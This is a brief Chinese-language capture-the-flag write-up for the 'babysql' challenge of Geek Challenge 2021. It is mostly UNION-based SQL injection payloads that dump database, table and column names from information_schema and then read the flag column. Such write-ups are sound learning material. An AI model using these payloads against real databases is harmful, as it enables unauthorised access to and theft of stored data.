极客大挑战 2021 babysql:
判断注入点,order by 到5的时候报错,接下来联合查询
爆库名:
输入:1’union select group_concat(schema_name),2,3,4 from information_schema.schemata#
…从这里也可以看出回显位为1和2
发现flag,
爆表名:
1’union select group_concat(table_name),2,3,4 from information_schema.tables where table_schema=‘flag’#
爆字段:
1’union select group_concat(column_name),2,3,4 from information_schema.columns where table_name='fllag'#
查字段:
(字段名) 库名.表名
1’ union select group_concat(fllllllag),2,3,4 from flag.fllag